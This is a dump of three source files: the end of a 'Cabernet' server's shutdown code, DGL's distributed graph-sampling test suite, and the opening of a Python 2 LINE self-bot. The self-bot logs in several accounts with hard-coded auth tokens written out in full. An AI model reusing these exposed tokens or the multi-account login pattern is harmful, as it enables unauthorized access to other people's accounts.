time.sleep(0.1)
if opersystem in ['Windows']:
time.sleep(2)
pickle_it.delete_pickle(plugins.__class__.__name__)
logger.info('Cabernet is now online.')
RESTART_REQUESTED = False
while not RESTART_REQUESTED:
time.sleep(5)
RESTART_REQUESTED = False
logger.info('Shutting Down...')
time.sleep(1)
terminate_processes(config, hdhr_serverx, ssdp_serverx, webadmin, tuner, scheduler, config_obj)
except KeyboardInterrupt:
logger.info('^C received, shutting down the server')
shutdown(config, hdhr_serverx, ssdp_serverx, webadmin, tuner, scheduler, config_obj)
def shutdown(_config, _hdhr_serverx, _ssdp_serverx, _webadmin, _tuner, _scheduler, _config_obj):
terminate_processes(_config, _hdhr_serverx, _ssdp_serverx, _webadmin, _tuner, _scheduler, _config_obj)
clean_exit()
def terminate_processes(_config, _hdhr_serverx, _ssdp_serverx, _webadmin, _tuner, _scheduler, _config_obj):
if not _config['hdhomerun']['disable_hdhr'] and _hdhr_serverx:
_hdhr_serverx.terminate()
_hdhr_serverx.join()
del _hdhr_serverx
if not _config['ssdp']['disable_ssdp'] and _ssdp_serverx:
_ssdp_serverx.terminate()
_ssdp_serverx.join()
del _ssdp_serverx
if _scheduler:
_scheduler.terminate()
del _scheduler
if _webadmin:
_webadmin.terminate()
_webadmin.join()
del _webadmin
if _tuner:
_tuner.terminate()
_tuner.join()
del _tuner
if _config_obj and _config_obj.defn_json:
_config_obj.defn_json.terminate()
del _config_obj
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.data import WN18Dataset
from dgl.distributed import sample_neighbors, sample_etype_neighbors
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import generate_ip_config, reset_envs
from pathlib import Path
import pytest
from scipy import sparse as spsp
import random
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name, graph_format=['csc', 'coo']):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem,
graph_format=graph_format)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
try:
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def start_find_edges_client(rank, tmpdir, disable_shared_mem, eids, etype=None):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_find_edges.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_find_edges", gpb=gpb)
try:
u, v = dist_graph.find_edges(eids, etype=etype)
except Exception as e:
print(e)
u, v = None, None
dgl.distributed.exit_client()
return u, v
def start_get_degrees_client(rank, tmpdir, disable_shared_mem, nids=None):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_get_degrees.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_get_degrees", gpb=gpb)
try:
in_deg = dist_graph.in_degrees(nids)
all_in_deg = dist_graph.in_degrees()
out_deg = dist_graph.out_degrees(nids)
all_out_deg = dist_graph.out_degrees()
except Exception as e:
print(e)
in_deg, out_deg, all_in_deg, all_out_deg = None, None, None, None
dgl.distributed.exit_client()
return in_deg, out_deg, all_in_deg, all_out_deg
def check_rpc_sampling(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
def check_rpc_find_edges_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
orig_nid, orig_eid = partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1,
'test_find_edges', ['csr', 'coo']))
p.start()
time.sleep(1)
pserver_list.append(p)
eids = F.tensor(np.random.randint(g.number_of_edges(), size=100))
u, v = g.find_edges(orig_eid[eids])
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids)
du = orig_nid[du]
dv = orig_nid[dv]
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
def create_random_hetero(dense=False, empty=False):
num_nodes = {'n1': 210, 'n2': 200, 'n3': 220} if dense else \
{'n1': 1010, 'n2': 1000, 'n3': 1020}
etypes = [('n1', 'r1', 'n2'),
('n1', 'r2', 'n3'),
('n2', 'r3', 'n3')]
edges = {}
random.seed(42)
for etype in etypes:
src_ntype, _, dst_ntype = etype
arr = spsp.random(num_nodes[src_ntype] - 10 if empty else num_nodes[src_ntype],
num_nodes[dst_ntype] - 10 if empty else num_nodes[dst_ntype],
density=0.1 if dense else 0.001,
format='coo', random_state=100)
edges[etype] = (arr.row, arr.col)
g = dgl.heterograph(edges, num_nodes)
g.nodes['n1'].data['feat'] = F.ones((g.number_of_nodes('n1'), 10), F.float32, F.cpu())
return g
def check_rpc_hetero_find_edges_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero()
num_parts = num_server
orig_nid, orig_eid = partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1,
'test_find_edges', ['csr', 'coo']))
p.start()
time.sleep(1)
pserver_list.append(p)
eids = F.tensor(np.random.randint(g.number_of_edges('r1'), size=100))
u, v = g.find_edges(orig_eid['r1'][eids], etype='r1')
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids, etype='r1')
du = orig_nid['n1'][du]
dv = orig_nid['n2'][dv]
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_find_edges_shuffle(num_server):
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), num_server)
check_rpc_find_edges_shuffle(Path(tmpdirname), num_server)
def check_rpc_get_degree_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_get_degrees', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_get_degrees'))
p.start()
time.sleep(1)
pserver_list.append(p)
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_get_degrees.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
nids = F.tensor(np.random.randint(g.number_of_nodes(), size=100))
in_degs, out_degs, all_in_degs, all_out_degs = start_get_degrees_client(0, tmpdir, num_server > 1, nids)
print("Done get_degree")
for p in pserver_list:
p.join()
print('check results')
assert F.array_equal(g.in_degrees(orig_nid[nids]), in_degs)
assert F.array_equal(g.in_degrees(orig_nid), all_in_degs)
assert F.array_equal(g.out_degrees(orig_nid[nids]), out_degs)
assert F.array_equal(g.out_degrees(orig_nid), all_out_degs)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_get_degree_shuffle(num_server):
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_get_degree_shuffle(Path(tmpdirname), num_server)
#@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
#@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skip('Only support partition with shuffle')
def test_rpc_sampling():
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
def start_hetero_sample_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
assert 'feat' in dist_graph.nodes['n1'].data
assert 'feat' not in dist_graph.nodes['n2'].data
assert 'feat' not in dist_graph.nodes['n3'].data
if gpb is None:
gpb = dist_graph.get_partition_book()
try:
sampled_graph = sample_neighbors(dist_graph, nodes, 3)
block = dgl.to_block(sampled_graph, nodes)
block.edata[dgl.EID] = sampled_graph.edata[dgl.EID]
except Exception as e:
print(e)
block = None
dgl.distributed.exit_client()
return block, gpb
def start_hetero_etype_sample_client(rank, tmpdir, disable_shared_mem, fanout=3,
nodes={'n3': [0, 10, 99, 66, 124, 208]}):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
assert 'feat' in dist_graph.nodes['n1'].data
assert 'feat' not in dist_graph.nodes['n2'].data
assert 'feat' not in dist_graph.nodes['n3'].data
if dist_graph.local_partition is not None:
# Check whether etypes are sorted in dist_graph
local_g = dist_graph.local_partition
local_nids = np.arange(local_g.num_nodes())
for lnid in local_nids:
leids = local_g.in_edges(lnid, form='eid')
letids = F.asnumpy(local_g.edata[dgl.ETYPE][leids])
_, indices = np.unique(letids, return_index=True)
assert np.all(indices[:-1] <= indices[1:])
if gpb is None:
gpb = dist_graph.get_partition_book()
try:
sampled_graph = sample_etype_neighbors(dist_graph, nodes, dgl.ETYPE, fanout)
block = dgl.to_block(sampled_graph, nodes)
block.edata[dgl.EID] = sampled_graph.edata[dgl.EID]
except Exception as e:
print(e)
block = None
dgl.distributed.exit_client()
return block, gpb
def check_rpc_hetero_sampling_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
block, gpb = start_hetero_sample_client(0, tmpdir, num_server > 1,
nodes = {'n3': [0, 10, 99, 66, 124, 208]})
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid_map = {ntype: F.zeros((g.number_of_nodes(ntype),), dtype=F.int64) for ntype in g.ntypes}
orig_eid_map = {etype: F.zeros((g.number_of_edges(etype),), dtype=F.int64) for etype in g.etypes}
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
ntype_ids, type_nids = gpb.map_to_per_ntype(part.ndata[dgl.NID])
for ntype_id, ntype in enumerate(g.ntypes):
idx = ntype_ids == ntype_id
F.scatter_row_inplace(orig_nid_map[ntype], F.boolean_mask(type_nids, idx),
F.boolean_mask(part.ndata['orig_id'], idx))
etype_ids, type_eids = gpb.map_to_per_etype(part.edata[dgl.EID])
for etype_id, etype in enumerate(g.etypes):
idx = etype_ids == etype_id
F.scatter_row_inplace(orig_eid_map[etype], F.boolean_mask(type_eids, idx),
F.boolean_mask(part.edata['orig_id'], idx))
for src_type, etype, dst_type in block.canonical_etypes:
src, dst = block.edges(etype=etype)
# These are global Ids after shuffling.
shuffled_src = F.gather_row(block.srcnodes[src_type].data[dgl.NID], src)
shuffled_dst = F.gather_row(block.dstnodes[dst_type].data[dgl.NID], dst)
shuffled_eid = block.edges[etype].data[dgl.EID]
orig_src = F.asnumpy(F.gather_row(orig_nid_map[src_type], shuffled_src))
orig_dst = F.asnumpy(F.gather_row(orig_nid_map[dst_type], shuffled_dst))
orig_eid = F.asnumpy(F.gather_row(orig_eid_map[etype], shuffled_eid))
# Check the node Ids and edge Ids.
orig_src1, orig_dst1 = g.find_edges(orig_eid, etype=etype)
assert np.all(F.asnumpy(orig_src1) == orig_src)
assert np.all(F.asnumpy(orig_dst1) == orig_dst)
def get_degrees(g, nids, ntype):
deg = F.zeros((len(nids),), dtype=F.int64)
for srctype, etype, dsttype in g.canonical_etypes:
if srctype == ntype:
deg += g.out_degrees(u=nids, etype=etype)
elif dsttype == ntype:
deg += g.in_degrees(v=nids, etype=etype)
return deg
def check_rpc_hetero_sampling_empty_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero(empty=True)
num_parts = num_server
num_hops = 1
orig_nids, _ = partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
deg = get_degrees(g, orig_nids['n3'], 'n3')
empty_nids = F.nonzero_1d(deg == 0)
block, gpb = start_hetero_sample_client(0, tmpdir, num_server > 1,
nodes = {'n3': empty_nids})
print("Done sampling")
for p in pserver_list:
p.join()
assert block.number_of_edges() == 0
assert len(block.etypes) == len(g.etypes)
def check_rpc_hetero_etype_sampling_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero(dense=True)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
fanout = 3
block, gpb = start_hetero_etype_sample_client(0, tmpdir, num_server > 1, fanout,
nodes={'n3': [0, 10, 99, 66, 124, 208]})
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = block.edges(etype=('n1', 'r2', 'n3'))
assert len(src) == 18
src, dst = block.edges(etype=('n2', 'r3', 'n3'))
assert len(src) == 18
orig_nid_map = {ntype: F.zeros((g.number_of_nodes(ntype),), dtype=F.int64) for ntype in g.ntypes}
orig_eid_map = {etype: F.zeros((g.number_of_edges(etype),), dtype=F.int64) for etype in g.etypes}
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
ntype_ids, type_nids = gpb.map_to_per_ntype(part.ndata[dgl.NID])
for ntype_id, ntype in enumerate(g.ntypes):
idx = ntype_ids == ntype_id
F.scatter_row_inplace(orig_nid_map[ntype], F.boolean_mask(type_nids, idx),
F.boolean_mask(part.ndata['orig_id'], idx))
etype_ids, type_eids = gpb.map_to_per_etype(part.edata[dgl.EID])
for etype_id, etype in enumerate(g.etypes):
idx = etype_ids == etype_id
F.scatter_row_inplace(orig_eid_map[etype], F.boolean_mask(type_eids, idx),
F.boolean_mask(part.edata['orig_id'], idx))
for src_type, etype, dst_type in block.canonical_etypes:
src, dst = block.edges(etype=etype)
# These are global Ids after shuffling.
shuffled_src = F.gather_row(block.srcnodes[src_type].data[dgl.NID], src)
shuffled_dst = F.gather_row(block.dstnodes[dst_type].data[dgl.NID], dst)
shuffled_eid = block.edges[etype].data[dgl.EID]
orig_src = F.asnumpy(F.gather_row(orig_nid_map[src_type], shuffled_src))
orig_dst = F.asnumpy(F.gather_row(orig_nid_map[dst_type], shuffled_dst))
orig_eid = F.asnumpy(F.gather_row(orig_eid_map[etype], shuffled_eid))
# Check the node Ids and edge Ids.
orig_src1, orig_dst1 = g.find_edges(orig_eid, etype=etype)
assert np.all(F.asnumpy(orig_src1) == orig_src)
assert np.all(F.asnumpy(orig_dst1) == orig_dst)
def check_rpc_hetero_etype_sampling_empty_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero(dense=True, empty=True)
num_parts = num_server
num_hops = 1
orig_nids, _ = partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
fanout = 3
deg = get_degrees(g, orig_nids['n3'], 'n3')
empty_nids = F.nonzero_1d(deg == 0)
block, gpb = start_hetero_etype_sample_client(0, tmpdir, num_server > 1, fanout,
nodes={'n3': empty_nids})
print("Done sampling")
for p in pserver_list:
p.join()
assert block.number_of_edges() == 0
assert len(block.etypes) == len(g.etypes)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_sampling_shuffle(num_server):
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_sampling_empty_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_etype_sampling_empty_shuffle(Path(tmpdirname), num_server)
def check_standalone_sampling(tmpdir, reshuffle):
g = CitationGraphDataset("cora")[0]
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
def check_standalone_etype_sampling(tmpdir, reshuffle):
hg = CitationGraphDataset('cora')[0]
num_parts = 1
num_hops = 1
partition_graph(hg, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_etype_neighbors(dist_graph, [0, 10, 99, 66, 1023], dgl.ETYPE, 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == hg.number_of_nodes()
assert np.all(F.asnumpy(hg.has_edges_between(src, dst)))
eids = hg.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
def check_standalone_etype_sampling_heterograph(tmpdir, reshuffle):
hg = CitationGraphDataset('cora')[0]
num_parts = 1
num_hops = 1
src, dst = hg.edges()
new_hg = dgl.heterograph({('paper', 'cite', 'paper'): (src, dst),
('paper', 'cite-by', 'paper'): (dst, src)},
{'paper': hg.number_of_nodes()})
partition_graph(new_hg, 'test_hetero_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_hetero_sampling", part_config=tmpdir / 'test_hetero_sampling.json')
sampled_graph = sample_etype_neighbors(dist_graph, [0, 1, 2, 10, 99, 66, 1023, 1024, 2700, 2701], dgl.ETYPE, 1)
src, dst = sampled_graph.edges(etype=('paper', 'cite', 'paper'))
assert len(src) == 10
src, dst = sampled_graph.edges(etype=('paper', 'cite-by', 'paper'))
assert len(src) == 10
assert sampled_graph.number_of_nodes() == new_hg.number_of_nodes()
dgl.distributed.exit_client()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname), False)
check_standalone_sampling(Path(tmpdirname), True)
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
dgl.distributed.initialize("rpc_ip_config.txt")
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("test_in_subgraph", gpb=gpb)
try:
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_in_subgraph.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
subg1 = dgl.in_subgraph(g, orig_nid[nodes])
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph_shuffle(Path(tmpdirname), 2)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
def test_standalone_etype_sampling():
reset_envs()
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling_heterograph(Path(tmpdirname), True)
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling(Path(tmpdirname), True)
check_standalone_etype_sampling(Path(tmpdirname), False)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling_heterograph(Path(tmpdirname), True)
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling(Path(tmpdirname), True)
check_standalone_etype_sampling(Path(tmpdirname), False)
check_standalone_sampling(Path(tmpdirname), True)
check_standalone_sampling(Path(tmpdirname), False)
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
check_rpc_get_degree_shuffle(Path(tmpdirname), 1)
check_rpc_get_degree_shuffle(Path(tmpdirname), 2)
check_rpc_find_edges_shuffle(Path(tmpdirname), 2)
check_rpc_find_edges_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), 2)
check_rpc_in_subgraph_shuffle(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_sampling_empty_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_etype_sampling_empty_shuffle(Path(tmpdirname), 1)
|
2.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile, shutil
from bs4 import BeautifulSoup
from urllib import urlopen
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
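# LINE self-bot built on LINETCR: a main account (cl) plus six helper accounts
# (ki..ki6), each logged in below with a hard-coded auth token.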
cl = LINETCR.LINE()
cl.login(token="Et4dAcXqNZY1MdJpQjId.EK+RXmzq+hz56T9crCkLRq.owlMIqHyRcWNCw6nHrla0S9F9gByJvz/bfbuvZUerDI=")
cl.loginResult()
print "cl login success"
ki = LINETCR.LINE()
ki.login(token="EpZmUMp6CzpG2MxrdrE9.Z2jqcI8fppmz+7xOGNlyEq.ttlVXdxR2I6A72rLY3B7apC+hyyUyuBQnYkKCO5J9RQ=")
print "ki login success"
ki2 = LINETCR.LINE()
ki2.login(token="Ep5x39yHINyEEVb7eaYa.Ql+Iq95c4olkmxSaoadLoG.guCtCeFRGAxadoTr/JxRhLsDyLTeTNTj285/W6Moadw=")
print "ki2 login success"
